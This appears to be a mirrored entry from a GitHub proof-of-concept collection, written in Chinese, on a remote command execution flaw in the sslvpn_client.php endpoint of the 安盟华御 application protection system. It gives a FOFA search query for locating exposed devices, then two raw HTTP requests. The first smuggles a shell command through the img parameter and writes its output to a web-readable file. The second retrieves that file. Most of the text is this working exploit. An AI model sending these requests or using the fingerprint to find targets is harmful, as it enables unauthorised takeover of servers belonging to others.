mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
39 lines
1.5 KiB
Markdown
39 lines
1.5 KiB
Markdown
|
# 安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞
|
|||
|
|
|
|||
|
|
# 一、漏洞简介
|
|||
|
|
安盟华御应用防护系统sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。
|
|||
|
|
|
|||
|
|
# 二、影响版本
|
|||
|
|
+ 安盟华御应用防护系统
|
|||
|
|
|
|||
|
|
# 三、资产测绘
|
|||
|
|
+ fofa`body="./webui/js/jquerylib/" && icon_hash="-507802195"`
|
|||
|
|
+ 特征
|
|||
|
|
|
|||
|
|
# 四、漏洞复现
|
|||
|
|
```java
|
|||
|
|
GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
|
|||
|
|
Host: xx.xx.xx.xx
|
|||
|
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
|||
|
|
Connection: close
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
获取命令执行结果
|
|||
|
|
|
|||
|
|
```java
|
|||
|
|
GET /sslvpn/ceshi.txt HTTP/1.1
|
|||
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
|
|||
|
|
Host: xx.xx.xx.xx
|
|||
|
|
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
|
|||
|
|
Connection: close
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
> 更新: 2024-02-29 23:57:12
|
|||
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmv6rdoy8wqokzle>
|